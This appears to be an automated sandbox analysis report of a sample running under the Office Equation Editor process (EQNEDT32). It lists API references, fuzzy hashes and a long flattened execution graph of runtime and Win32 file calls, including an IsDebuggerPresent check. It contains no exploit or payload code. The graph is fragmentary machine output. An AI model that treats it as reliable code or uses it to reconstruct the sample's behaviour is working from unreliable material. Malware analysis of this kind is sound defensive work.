                                                      Similarity
                                                      • API ID: ExecuteExitProcessShell
                                                      • String ID:
                                                      • API String ID: 1124553745-0
                                                      • Opcode ID: 3e3e05e3a10e0b329dbe111682049233d00d728cb39c331fd52637c740ff1eff
                                                      • Instruction ID: f13e0f2be141ec292d2e822703a3aaae24bda593379f2dc0f2e73994508a580d
                                                      • Opcode Fuzzy Hash: 3e3e05e3a10e0b329dbe111682049233d00d728cb39c331fd52637c740ff1eff
                                                      • Instruction Fuzzy Hash: C2F0A2C98342C2DFCAB0E6E8F4552EAA611FB41208F8C884E9885030F7D028C1C38619

                                                      Control-flow Graph

                                                      APIs
                                                      • ExitProcess.KERNEL32(00000000), ref: 035C04E4
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.456215028.00000000035C0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_35c0000_EQNEDT32.jbxd
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID:
                                                      • API String ID: 621844428-0
                                                      • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                      • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                                                      • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                      • Instruction Fuzzy Hash:

                                                      Control-flow Graph

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.456215028.00000000035C0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_35c0000_EQNEDT32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                      • Instruction ID: a31a16de6f75b3ace4cf84b8c35201c11f12358ba0c77cc5ee85fa2957a35c36
                                                      • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                      • Instruction Fuzzy Hash: 9AD05275222582CFC304DF08D980E57F37AFFC8624B28C2A8E0004B66AD730EC92CA94

                                                      Control-flow Graph

                                                      APIs
                                                      • ExitProcess.KERNEL32(035C0320), ref: 035C0332
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.456215028.00000000035C0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_35c0000_EQNEDT32.jbxd
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID:
                                                      • API String ID: 621844428-0
                                                      • Opcode ID: d5d9092efee72c7dede64c69652709bd6a2087090d3ab9cdc19f5b80716a85da
                                                      • Instruction ID: 778c39b3255860dc9ae7c137f3789a68a93846cf9cf2b787d4e3b911c7fc34f9
                                                      • Opcode Fuzzy Hash: d5d9092efee72c7dede64c69652709bd6a2087090d3ab9cdc19f5b80716a85da
                                                      • Instruction Fuzzy Hash: 0211815582E7C09FC712D7B02E69049BF60BA53818B5C86DFD0968B0F3D258D606D352

                                                      Execution Graph

                                                      Execution Coverage:3.6%
                                                      Dynamic/Decrypted Code Coverage:0.4%
                                                      Signature Coverage:8.1%
                                                      Total number of Nodes:2000
                                                      Total number of Limit Nodes:173
828af4 59 API calls __getptd_noexit 105264->105356 105265->105264 105268 830f1b 105265->105268 105270 830f39 105265->105270 105297 830e88 105265->105297 105268->105264 105273 830f26 105268->105273 105357 82881d 59 API calls 2 library calls 105270->105357 105343 835c6b 105273->105343 105274 830f49 105276 830f51 105274->105276 105277 830f6c 105274->105277 105275 83103a 105278 8310b3 ReadFile 105275->105278 105284 831050 GetConsoleMode 105275->105284 105358 828b28 59 API calls __getptd_noexit 105276->105358 105360 8318c1 61 API calls 3 library calls 105277->105360 105281 831593 GetLastError 105278->105281 105282 8310d5 105278->105282 105285 8315a0 105281->105285 105286 831093 105281->105286 105282->105281 105291 8310a5 105282->105291 105283 830f56 105359 828af4 59 API calls __getptd_noexit 105283->105359 105288 8310b0 105284->105288 105289 831064 105284->105289 105366 828b28 59 API calls __getptd_noexit 105285->105366 105299 831099 105286->105299 105361 828b07 59 API calls 2 library calls 105286->105361 105288->105278 105289->105288 105292 83106a ReadConsoleW 105289->105292 105291->105299 105300 831377 105291->105300 105301 83110a 105291->105301 105292->105291 105294 83108d GetLastError 105292->105294 105293 8315a5 105367 828af4 59 API calls __getptd_noexit 105293->105367 105294->105286 105297->105235 105298 822d55 _free 59 API calls 105298->105297 105299->105297 105299->105298 105300->105299 105307 83147d ReadFile 105300->105307 105303 831176 ReadFile 105301->105303 105311 8311f7 105301->105311 105304 831197 GetLastError 105303->105304 105308 8311a1 105303->105308 105304->105308 105305 8312b4 105314 831264 MultiByteToWideChar 105305->105314 105364 8318c1 61 API calls 3 library calls 105305->105364 105306 8312a4 105363 828b28 59 API calls __getptd_noexit 105306->105363 105310 8314a0 GetLastError 105307->105310 105315 8314ae 105307->105315 105308->105301 105362 8318c1 61 API calls 3 library calls 105308->105362 105310->105315 105311->105299 105311->105305 
105311->105306 105311->105314 105314->105294 105314->105299 105315->105300 105365 8318c1 61 API calls 3 library calls 105315->105365 105318 830bb2 105317->105318 105322 830bc7 105317->105322 105404 828b28 59 API calls __getptd_noexit 105318->105404 105320 830bb7 105405 828db6 9 API calls _fprintf 105320->105405 105324 830bfc 105322->105324 105331 830bc2 105322->105331 105406 835fe4 59 API calls __malloc_crt 105322->105406 105325 8246e6 _fprintf 59 API calls 105324->105325 105326 830c10 105325->105326 105371 830d47 105326->105371 105328 830c17 105329 8246e6 _fprintf 59 API calls 105328->105329 105328->105331 105330 830c3a 105329->105330 105330->105331 105332 8246e6 _fprintf 59 API calls 105330->105332 105331->105235 105333 830c46 105332->105333 105333->105331 105334 8246e6 _fprintf 59 API calls 105333->105334 105335 830c53 105334->105335 105336 8246e6 _fprintf 59 API calls 105335->105336 105336->105331 105337->105228 105338->105238 105339->105235 105340->105228 105341->105246 105342->105248 105344 835c76 105343->105344 105346 835c83 105343->105346 105345 828b28 __set_osfhnd 59 API calls 105344->105345 105347 835c7b 105345->105347 105348 835c8f 105346->105348 105349 828b28 __set_osfhnd 59 API calls 105346->105349 105347->105275 105348->105275 105350 835cb0 105349->105350 105351 828db6 _fprintf 9 API calls 105350->105351 105351->105347 105352->105254 105353->105297 105354->105263 105355->105262 105356->105263 105357->105274 105358->105283 105359->105297 105360->105273 105361->105299 105362->105308 105363->105299 105364->105314 105365->105315 105366->105293 105367->105299 105368->105258 105369->105262 105370->105297 105372 830d53 _fprintf 105371->105372 105373 830d60 105372->105373 105374 830d77 105372->105374 105376 828af4 __set_osfhnd 59 API calls 105373->105376 105375 830e3b 105374->105375 105377 830d8b 105374->105377 105378 828af4 __set_osfhnd 59 API calls 105375->105378 105379 830d65 105376->105379 105380 830db6 105377->105380 105381 830da9 105377->105381 105382 
830dae 105378->105382 105383 828b28 __set_osfhnd 59 API calls 105379->105383 105385 830dc3 105380->105385 105386 830dd8 105380->105386 105384 828af4 __set_osfhnd 59 API calls 105381->105384 105389 828b28 __set_osfhnd 59 API calls 105382->105389 105391 830d6c _fprintf 105383->105391 105384->105382 105387 828af4 __set_osfhnd 59 API calls 105385->105387 105388 82d206 ___lock_fhandle 60 API calls 105386->105388 105392 830dc8 105387->105392 105393 830dde 105388->105393 105390 830dd0 105389->105390 105398 828db6 _fprintf 9 API calls 105390->105398 105391->105328 105396 828b28 __set_osfhnd 59 API calls 105392->105396 105394 830df1 105393->105394 105395 830e04 105393->105395 105397 830e5b __read_nolock 71 API calls 105394->105397 105399 828b28 __set_osfhnd 59 API calls 105395->105399 105396->105390 105400 830dfd 105397->105400 105398->105391 105401 830e09 105399->105401 105403 830e33 __read RtlLeaveCriticalSection 105400->105403 105402 828af4 __set_osfhnd 59 API calls 105401->105402 105402->105400 105403->105391 105404->105320 105405->105331 105406->105324 105410 82520a GetSystemTimeAsFileTime 105407->105410 105409 868f6e 105409->105001 105411 825238 __aulldiv 105410->105411 105411->105409 105413 825c6c _fprintf 105412->105413 105414 825c93 105413->105414 105415 825c7e 105413->105415 105417 826c11 __lock_file 60 API calls 105414->105417 105426 828b28 59 API calls __getptd_noexit 105415->105426 105419 825c99 105417->105419 105418 825c83 105427 828db6 9 API calls _fprintf 105418->105427 105428 8258d0 68 API calls 6 library calls 105419->105428 105422 825ca4 105429 825cc4 RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 105422->105429 105424 825cb6 105425 825c8e _fprintf 105424->105425 105425->105006 105426->105418 105427->105425 105428->105422 105429->105424 105446 808740 105430->105446 105432 8089c3 105433 808a3d 105432->105433 105434 8089cd 105432->105434 105455 809d3c 61 API calls Mailbox 105433->105455 105435 820db6 Mailbox 60 API calls 105434->105435 105437 
8089de 105435->105437 105439 8089ec 105437->105439 105440 807667 60 API calls 105437->105440 105438 808a2d 105438->104871 105441 8089fb 105439->105441 105453 807f77 60 API calls 2 library calls 105439->105453 105440->105439 105442 820db6 Mailbox 60 API calls 105441->105442 105444 808a05 105442->105444 105454 808660 69 API calls 105444->105454 105447 808921 105446->105447 105448 808753 105446->105448 105447->105432 105449 807667 60 API calls 105448->105449 105452 808764 105448->105452 105450 808983 105449->105450 105451 822d40 __cinit 68 API calls 105450->105451 105451->105452 105452->105432 105453->105441 105454->105438 105455->105438 105456->104884 105457->104886 105458->104882 105459->104892 105461 809169 Mailbox 105460->105461 105462 83f19f 105461->105462 105467 809173 105461->105467 105463 820db6 Mailbox 60 API calls 105462->105463 105465 83f1ab 105463->105465 105464 80917a 105464->104896 105467->105464 105468 809c90 60 API calls Mailbox 105467->105468 105468->105467 105469->104903 105470->104902 105476 869748 __tzset_nolock _wcscmp 105471->105476 105472 8695dc 105472->104913 105472->104941 105473 869109 GetSystemTimeAsFileTime 105473->105476 105474 804f0b 75 API calls 105474->105476 105475 804ee5 86 API calls 105475->105476 105476->105472 105476->105473 105476->105474 105476->105475 105478 868b1f 105477->105478 105479 868b11 105477->105479 105481 868b64 105478->105481 105482 82525b 116 API calls 105478->105482 105493 868b28 105478->105493 105480 82525b 116 API calls 105479->105480 105480->105478 105508 868d91 105481->105508 105483 868b49 105482->105483 105483->105481 105486 868b52 105483->105486 105485 868ba8 105487 868bac 105485->105487 105488 868bcd 105485->105488 105490 8253a6 __fcloseall 84 API calls 105486->105490 105486->105493 105489 868bb9 105487->105489 105492 8253a6 __fcloseall 84 API calls 105487->105492 105512 8689a9 105488->105512 105489->105493 105495 8253a6 __fcloseall 84 API calls 105489->105495 105490->105493 105492->105489 105493->104942 
105495->105493 105496 868bfb 105521 868c2b 105496->105521 105497 868bdb 105499 868be8 105497->105499 105501 8253a6 __fcloseall 84 API calls 105497->105501 105499->105493 105502 8253a6 __fcloseall 84 API calls 105499->105502 105501->105499 105502->105493 105505 868c16 105505->105493 105507 8253a6 __fcloseall 84 API calls 105505->105507 105507->105493 105509 868db6 105508->105509 105511 868d9f __tzset_nolock _memmove 105508->105511 105510 8255e2 __fread_nolock 75 API calls 105509->105510 105510->105511 105511->105485 105513 82571c __crtGetStringTypeA_stat 59 API calls 105512->105513 105514 8689b8 105513->105514 105515 82571c __crtGetStringTypeA_stat 59 API calls 105514->105515 105516 8689cc 105515->105516 105517 82571c __crtGetStringTypeA_stat 59 API calls 105516->105517 105518 8689e0 105517->105518 105519 868d0d 59 API calls 105518->105519 105520 8689f3 105518->105520 105519->105520 105520->105496 105520->105497 105525 868c40 105521->105525 105522 868cf8 105554 868f35 105522->105554 105524 868a05 75 API calls 105524->105525 105525->105522 105525->105524 105528 868c02 105525->105528 105550 868e12 105525->105550 105558 868aa1 75 API calls 105525->105558 105529 868d0d 105528->105529 105530 868d20 105529->105530 105531 868d1a 105529->105531 105533 822d55 _free 59 API calls 105530->105533 105534 868d31 105530->105534 105532 822d55 _free 59 API calls 105531->105532 105532->105530 105533->105534 105535 822d55 _free 59 API calls 105534->105535 105536 868c09 105534->105536 105535->105536 105536->105505 105537 8253a6 105536->105537 105538 8253b2 _fprintf 105537->105538 105539 8253c6 105538->105539 105540 8253de 105538->105540 105607 828b28 59 API calls __getptd_noexit 105539->105607 105543 826c11 __lock_file 60 API calls 105540->105543 105546 8253d6 _fprintf 105540->105546 105542 8253cb 105608 828db6 9 API calls _fprintf 105542->105608 105545 8253f0 105543->105545 105591 82533a 105545->105591 105546->105505 105551 868e21 105550->105551 105552 868e61 105550->105552 
105551->105525 105552->105551 105559 868ee8 105552->105559 105555 868f42 105554->105555 105557 868f53 105554->105557 105556 824863 81 API calls 105555->105556 105556->105557 105557->105528 105558->105525 105560 868f14 105559->105560 105561 868f25 105559->105561 105563 824863 105560->105563 105561->105552 105564 82486f _fprintf 105563->105564 105565 82489d _fprintf 105564->105565 105566 8248a5 105564->105566 105567 82488d 105564->105567 105565->105561 105568 826c11 __lock_file 60 API calls 105566->105568 105588 828b28 59 API calls __getptd_noexit 105567->105588 105570 8248ab 105568->105570 105576 82470a 105570->105576 105571 824892 105589 828db6 9 API calls _fprintf 105571->105589 105578 824719 105576->105578 105583 824737 105576->105583 105577 824727 105579 828b28 __set_osfhnd 59 API calls 105577->105579 105578->105577 105578->105583 105587 824751 _memmove 105578->105587 105580 82472c 105579->105580 105581 828db6 _fprintf 9 API calls 105580->105581 105581->105583 105582 82ae1e __flsbuf 79 API calls 105582->105587 105590 8248dd RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 105583->105590 105584 824a3d __flush 79 API calls 105584->105587 105585 8246e6 _fprintf 59 API calls 105585->105587 105586 82d886 __write 79 API calls 105586->105587 105587->105582 105587->105583 105587->105584 105587->105585 105587->105586 105588->105571 105589->105565 105590->105565 105592 825349 105591->105592 105593 82535d 105591->105593 105646 828b28 59 API calls __getptd_noexit 105592->105646 105595 825359 105593->105595 105610 824a3d 105593->105610 105609 825415 RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 105595->105609 105596 82534e 105647 828db6 9 API calls _fprintf 105596->105647 105602 8246e6 _fprintf 59 API calls 105603 825377 105602->105603 105620 830a02 105603->105620 105605 82537d 105605->105595 105606 822d55 _free 59 API calls 105605->105606 105606->105595 105607->105542 105608->105546 105609->105546 105611 824a50 105610->105611 105612 824a74 105610->105612 
105611->105612 105613 8246e6 _fprintf 59 API calls 105611->105613 105616 830b77 105612->105616 105614 824a6d 105613->105614 105648 82d886 105614->105648 105617 825371 105616->105617 105618 830b84 105616->105618 105617->105602 105618->105617 105619 822d55 _free 59 API calls 105618->105619 105619->105617 105621 830a0e _fprintf 105620->105621 105622 830a32 105621->105622 105623 830a1b 105621->105623 105625 830abd 105622->105625 105627 830a42 105622->105627 105773 828af4 59 API calls __getptd_noexit 105623->105773 105778 828af4 59 API calls __getptd_noexit 105625->105778 105626 830a20 105774 828b28 59 API calls __getptd_noexit 105626->105774 105630 830a60 105627->105630 105631 830a6a 105627->105631 105775 828af4 59 API calls __getptd_noexit 105630->105775 105633 82d206 ___lock_fhandle 60 API calls 105631->105633 105632 830a65 105779 828b28 59 API calls __getptd_noexit 105632->105779 105637 830a70 105633->105637 105634 830a27 _fprintf 105634->105605 105639 830a83 105637->105639 105640 830a8e 105637->105640 105638 830ac9 105780 828db6 9 API calls _fprintf 105638->105780 105758 830add 105639->105758 105776 828b28 59 API calls __getptd_noexit 105640->105776 105644 830a89 105777 830ab5 RtlLeaveCriticalSection __unlock_fhandle 105644->105777 105646->105596 105647->105595 105649 82d892 _fprintf 105648->105649 105650 82d8b6 105649->105650 105651 82d89f 105649->105651 105653 82d955 105650->105653 105655 82d8ca 105650->105655 105749 828af4 59 API calls __getptd_noexit 105651->105749 105755 828af4 59 API calls __getptd_noexit 105653->105755 105654 82d8a4 105750 828b28 59 API calls __getptd_noexit 105654->105750 105658 82d8f2 105655->105658 105659 82d8e8 105655->105659 105676 82d206 105658->105676 105751 828af4 59 API calls __getptd_noexit 105659->105751 105663 82d8f8 105666 82d90b 105663->105666 105667 82d91e 105663->105667 105664 82d8ed 105756 828b28 59 API calls __getptd_noexit 105664->105756 105665 82d961 105757 828db6 9 API calls _fprintf 105665->105757 105685 82d975 
105666->105685 105752 828b28 59 API calls __getptd_noexit 105667->105752 105671 82d917 105754 82d94d RtlLeaveCriticalSection __unlock_fhandle 105671->105754 105672 82d923 105753 828af4 59 API calls __getptd_noexit 105672->105753 105673 82d8ab _fprintf 105673->105612 105677 82d212 _fprintf 105676->105677 105678 82d261 RtlEnterCriticalSection 105677->105678 105680 829c0b __lock 59 API calls 105677->105680 105679 82d287 _fprintf 105678->105679 105679->105663 105681 82d237 105680->105681 105682 82d24f 105681->105682 105683 829e2b __ioinit InitializeCriticalSectionEx InitializeCriticalSectionAndSpinCount 105681->105683 105684 82d28b ___lock_fhandle RtlLeaveCriticalSection 105682->105684 105683->105682 105684->105678 105686 82d982 __ftell_nolock 105685->105686 105687 82d9e0 105686->105687 105688 82d9c1 105686->105688 105719 82d9b6 105686->105719 105693 82da38 105687->105693 105694 82da1c 105687->105694 105690 828af4 __set_osfhnd 59 API calls 105688->105690 105689 82c5f6 __crtGetStringTypeA_stat 6 API calls 105691 82e1d6 105689->105691 105692 82d9c6 105690->105692 105691->105671 105695 828b28 __set_osfhnd 59 API calls 105692->105695 105696 82da51 105693->105696 105699 8318c1 __lseeki64_nolock 61 API calls 105693->105699 105697 828af4 __set_osfhnd 59 API calls 105694->105697 105698 82d9cd 105695->105698 105700 835c6b __write_nolock 59 API calls 105696->105700 105701 82da21 105697->105701 105703 828db6 _fprintf 9 API calls 105698->105703 105699->105696 105704 82da5f 105700->105704 105702 828b28 __set_osfhnd 59 API calls 105701->105702 105705 82da28 105702->105705 105703->105719 105706 82ddb8 105704->105706 105712 8299ac __setmbcp 59 API calls 105704->105712 105707 828db6 _fprintf 9 API calls 105705->105707 105708 82ddd6 105706->105708 105709 82e14b WriteFile 105706->105709 105707->105719 105710 82defa 105708->105710 105717 82ddec 105708->105717 105711 82ddab GetLastError 105709->105711 105721 82dd78 105709->105721 105722 82dfef 105710->105722 105724 82df05 105710->105724 
105711->105721 105714 82da8b GetConsoleMode 105712->105714 105713 82e184 105713->105719 105720 828b28 __set_osfhnd 59 API calls 105713->105720 105714->105706 105715 82daca 105714->105715 105715->105706 105716 82dada GetConsoleCP 105715->105716 105716->105713 105746 82db09 105716->105746 105717->105713 105718 82de5b WriteFile 105717->105718 105718->105711 105723 82de98 105718->105723 105719->105689 105725 82e1b2 105720->105725 105721->105713 105721->105719 105726 82ded8 105721->105726 105722->105713 105727 82e064 WideCharToMultiByte 105722->105727 105723->105717 105728 82debc 105723->105728 105724->105713 105729 82df6a WriteFile 105724->105729 105730 828af4 __set_osfhnd 59 API calls 105725->105730 105731 82dee3 105726->105731 105732 82e17b 105726->105732 105727->105711 105742 82e0ab 105727->105742 105728->105721 105729->105711 105734 82dfb9 105729->105734 105730->105719 105735 828b28 __set_osfhnd 59 API calls 105731->105735 105733 828b07 __dosmaperr 59 API calls 105732->105733 105733->105719 105734->105721 105734->105724 105734->105728 105736 82dee8 105735->105736 105738 828af4 __set_osfhnd 59 API calls 105736->105738 105737 82e0b3 WriteFile 105740 82e106 GetLastError 105737->105740 105737->105742 105738->105719 105739 8235f5 __write_nolock 59 API calls 105739->105746 105740->105742 105741 8362ba 61 API calls __write_nolock 105741->105746 105742->105721 105742->105722 105742->105728 105742->105737 105743 837a5e WriteConsoleW CreateFileW __putwch_nolock 105747 82dc5f 105743->105747 105744 82dbf2 WideCharToMultiByte 105744->105721 105745 82dc2d WriteFile 105744->105745 105745->105711 105745->105747 105746->105721 105746->105739 105746->105741 105746->105744 105746->105747 105747->105711 105747->105721 105747->105743 105747->105746 105748 82dc87 WriteFile 105747->105748 105748->105711 105748->105747 105749->105654 105750->105673 105751->105664 105752->105672 105753->105671 105754->105673 105755->105664 105756->105665 105757->105673 105781 82d4c3 105758->105781 105760 
830b41 105794 82d43d 60 API calls __set_osfhnd 105760->105794 105761 830aeb 105761->105760 105762 830b1f 105761->105762 105765 82d4c3 __lseek_nolock 59 API calls 105761->105765 105762->105760 105766 82d4c3 __lseek_nolock 59 API calls 105762->105766 105764 830b49 105767 830b6b 105764->105767 105795 828b07 59 API calls 2 library calls 105764->105795 105768 830b16 105765->105768 105769 830b2b CloseHandle 105766->105769 105767->105644 105771 82d4c3 __lseek_nolock 59 API calls 105768->105771 105769->105760 105772 830b37 GetLastError 105769->105772 105771->105762 105772->105760 105773->105626 105774->105634 105775->105632 105776->105644 105777->105634 105778->105632 105779->105638 105780->105634 105782 82d4e3 105781->105782 105783 82d4ce 105781->105783 105785 828af4 __set_osfhnd 59 API calls 105782->105785 105789 82d508 105782->105789 105784 828af4 __set_osfhnd 59 API calls 105783->105784 105786 82d4d3 105784->105786 105787 82d512 105785->105787 105788 828b28 __set_osfhnd 59 API calls 105786->105788 105790 828b28 __set_osfhnd 59 API calls 105787->105790 105792 82d4db 105788->105792 105789->105761 105791 82d51a 105790->105791 105793 828db6 _fprintf 9 API calls 105791->105793 105792->105761 105793->105792 105794->105764 105795->105767 105858 831940 105796->105858 105799 804799 105864 807d8c 105799->105864 105800 80477c 105801 807bcc 60 API calls 105800->105801 105803 804788 105801->105803 105860 807726 105803->105860 105806 820791 105807 82079e __ftell_nolock 105806->105807 105808 82079f GetLongPathNameW 105807->105808 105809 807bcc 60 API calls 105808->105809 105810 8072bd 105809->105810 105811 80700b 105810->105811 105812 807667 60 API calls 105811->105812 105813 80701d 105812->105813 105814 804750 61 API calls 105813->105814 105815 807028 105814->105815 105816 807033 105815->105816 105820 83e885 105815->105820 105817 803f74 60 API calls 105816->105817 105819 80703f 105817->105819 105868 8034c2 105819->105868 105822 83e89f 105820->105822 105874 807908 62 API calls 
105820->105874 105823 807052 Mailbox 105823->104709 105825 804ddd 137 API calls 105824->105825 105826 80688f 105825->105826 105827 83e031 105826->105827 105828 804ddd 137 API calls 105826->105828 105829 86955b 123 API calls 105827->105829 105830 8068a3 105828->105830 105831 83e046 105829->105831 105830->105827 105832 8068ab 105830->105832 105833 83e067 105831->105833 105834 83e04a 105831->105834 105837 83e052 105832->105837 105838 8068b7 105832->105838 105836 820db6 Mailbox 60 API calls 105833->105836 105835 804e4a 85 API calls 105834->105835 105835->105837 105847 83e0ac Mailbox 105836->105847 105968 8642f8 91 API calls _wprintf 105837->105968 105875 806a8c 105838->105875 105841 83e060 105841->105833 105843 83e260 105844 822d55 _free 59 API calls 105843->105844 105845 83e268 105844->105845 105846 804e4a 85 API calls 105845->105846 105852 83e271 105846->105852 105847->105843 105847->105852 105855 807de1 60 API calls 105847->105855 105969 85f73d 60 API calls 2 library calls 105847->105969 105970 85f65e 62 API calls 2 library calls 105847->105970 105971 86737f 60 API calls Mailbox 105847->105971 105972 80750f 60 API calls 2 library calls 105847->105972 105973 80735d 60 API calls Mailbox 105847->105973 105851 822d55 _free 59 API calls 105851->105852 105852->105851 105854 804e4a 85 API calls 105852->105854 105974 85f7a1 90 API calls 4 library calls 105852->105974 105854->105852 105855->105847 105859 80475d GetFullPathNameW 105858->105859 105859->105799 105859->105800 105861 807734 105860->105861 105862 807d2c 60 API calls 105861->105862 105863 804794 105862->105863 105863->105806 105865 807da6 105864->105865 105866 807d99 105864->105866 105867 820db6 Mailbox 60 API calls 105865->105867 105866->105803 105867->105866 105869 8034d4 105868->105869 105873 8034f3 _memmove 105868->105873 105871 820db6 Mailbox 60 API calls 105869->105871 105870 820db6 Mailbox 60 API calls 105872 80350a 105870->105872 105871->105873 105872->105823 105873->105870 105874->105820 105876 806ab5 
105875->105876 105877 83e41e 105875->105877 105980 8057a6 61 API calls Mailbox 105876->105980 106066 85f7a1 90 API calls 4 library calls 105877->106066 105880 806ad7 105981 8057f6 105880->105981 105881 83e431 106067 85f7a1 90 API calls 4 library calls 105881->106067 105884 806af4 105886 807667 60 API calls 105884->105886 105888 806b00 105886->105888 105887 83e44d 105916 806b61 105887->105916 105994 820957 61 API calls __ftell_nolock 105888->105994 105890 806b0c 105895 807667 60 API calls 105890->105895 105891 83e460 105893 805c6f CloseHandle 105891->105893 105892 806b6f 105894 807667 60 API calls 105892->105894 105896 83e46c 105893->105896 105897 806b78 105894->105897 105898 806b18 105895->105898 105899 804ddd 137 API calls 105896->105899 105900 807667 60 API calls 105897->105900 105901 804750 61 API calls 105898->105901 105905 83e488 105899->105905 105902 806b81 105900->105902 105903 806b26 105901->105903 106004 80459b 105902->106004 105995 805850 ReadFile SetFilePointerEx 105903->105995 105904 83e4b1 106068 85f7a1 90 API calls 4 library calls 105904->106068 105905->105904 105908 86955b 123 API calls 105905->105908 105913 83e4a4 105908->105913 105911 806b52 105996 805aee 105911->105996 105917 83e4cd 105913->105917 105918 83e4ac 105913->105918 105915 83e4c8 105947 806d0c Mailbox 105915->105947 105916->105891 105916->105892 105921 804e4a 85 API calls 105917->105921 105920 804e4a 85 API calls 105918->105920 105920->105904 105922 83e4d2 105921->105922 105923 820db6 Mailbox 60 API calls 105922->105923 105930 83e506 105923->105930 105928 803bbb 105928->104571 105928->104594 106069 80750f 60 API calls 2 library calls 105930->106069 105935 83e740 106075 8672df 60 API calls Mailbox 105935->106075 105939 83e762 106076 87fbce 60 API calls 2 library calls 105939->106076 105942 83e76f 105944 822d55 _free 59 API calls 105942->105944 105944->105947 105975 8057d4 105947->105975 105958 807de1 60 API calls 105963 83e54f Mailbox 105958->105963 105961 83e792 106077 85f7a1 90 API 
calls 4 library calls 105961->106077 105963->105935 105963->105958 105963->105961 106070 85f73d 60 API calls 2 library calls 105963->106070 106071 85f65e 62 API calls 2 library calls 105963->106071 106072 86737f 60 API calls Mailbox 105963->106072 106073 80750f 60 API calls 2 library calls 105963->106073 106074 807213 60 API calls Mailbox 105963->106074 105965 83e7ab 105966 822d55 _free 59 API calls 105965->105966 105967 83e7be 105966->105967 105967->105947 105968->105841 105969->105847 105970->105847 105971->105847 105972->105847 105973->105847 105974->105852 105976 805c6f CloseHandle 105975->105976 105977 8057dc Mailbox 105976->105977 105978 805c6f CloseHandle 105977->105978 105979 8057eb 105978->105979 105979->105928 105980->105880 105982 805c6f CloseHandle 105981->105982 105983 805802 105982->105983 106080 805c99 105983->106080 105985 805821 105986 805844 105985->105986 106088 805610 105985->106088 105986->105881 105986->105884 105988 805833 106105 80527b SetFilePointerEx SetFilePointerEx 105988->106105 105990 80583a 105990->105986 105991 83dc07 105990->105991 106106 86345a SetFilePointerEx SetFilePointerEx WriteFile 105991->106106 105993 83dc37 105993->105986 105994->105890 105995->105911 106003 805b08 105996->106003 105997 805b8f SetFilePointerEx 106119 805c4e SetFilePointerEx 105997->106119 106000 83dd28 106120 805c4e SetFilePointerEx 106000->106120 106001 805b63 106001->105916 106002 83dd42 106003->105997 106003->106000 106003->106001 106005 807667 60 API calls 106004->106005 106006 8045b1 106005->106006 106007 807667 60 API calls 106006->106007 106008 8045b9 106007->106008 106009 807667 60 API calls 106008->106009 106010 8045c1 106009->106010 106011 807667 60 API calls 106010->106011 106012 8045c9 106011->106012 106013 83d4d2 106012->106013 106014 8045fd 106012->106014 106015 808047 60 API calls 106013->106015 106016 80784b 60 API calls 106014->106016 106017 83d4db 106015->106017 106018 80460b 106016->106018 106019 807d8c 60 API calls 106017->106019 106020 
807d2c 60 API calls 106018->106020 106022 804640 106019->106022 106021 804615 106020->106021 106021->106022 106023 80784b 60 API calls 106021->106023 106024 804680 106022->106024 106025 80465f 106022->106025 106037 83d4fb 106022->106037 106026 804636 106023->106026 106121 80784b 106024->106121 106031 8079f2 60 API calls 106025->106031 106030 807d2c 60 API calls 106026->106030 106028 804691 106032 8046a3 106028->106032 106035 808047 60 API calls 106028->106035 106029 83d5cb 106033 807bcc 60 API calls 106029->106033 106030->106022 106034 804669 106031->106034 106036 8046b3 106032->106036 106038 808047 60 API calls 106032->106038 106044 83d588 106033->106044 106034->106024 106041 80784b 60 API calls 106034->106041 106035->106032 106040 8046ba 106036->106040 106042 808047 60 API calls 106036->106042 106037->106029 106039 83d5b4 106037->106039 106052 83d532 106037->106052 106038->106036 106039->106029 106046 83d59f 106039->106046 106043 808047 60 API calls 106040->106043 106050 8046c1 Mailbox 106040->106050 106041->106024 106042->106040 106043->106050 106044->106024 106045 8079f2 60 API calls 106044->106045 106134 807924 60 API calls 2 library calls 106044->106134 106045->106044 106049 807bcc 60 API calls 106046->106049 106047 83d590 106048 807bcc 60 API calls 106047->106048 106048->106044 106049->106044 106052->106047 106053 83d57b 106052->106053 106054 807bcc 60 API calls 106053->106054 106054->106044 106066->105881 106067->105887 106068->105915 106069->105963 106070->105963 106071->105963 106072->105963 106073->105963 106074->105963 106075->105939 106076->105942 106077->105965 106081 805cb2 CreateFileW 106080->106081 106082 83dd58 106080->106082 106085 805cd4 106081->106085 106083 83dd5e CreateFileW 106082->106083 106082->106085 106084 83dd84 106083->106084 106083->106085 106086 805aee 2 API calls 106084->106086 106085->105985 106087 83dd8f 106086->106087 106087->106085 106089 83dba5 106088->106089 106090 80562b 106088->106090 106104 8056ba 106089->106104 106113 

                                                      Control-flow Graph

                                                      APIs
                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00803B68
                                                      • IsDebuggerPresent.KERNEL32 ref: 00803B7A
                                                      • GetFullPathNameW.KERNEL32(00007FFF,?,?,008C52F8,008C52E0,?,?), ref: 00803BEB
                                                        • Part of subcall function 00807BCC: _memmove.LIBCMT ref: 00807C06
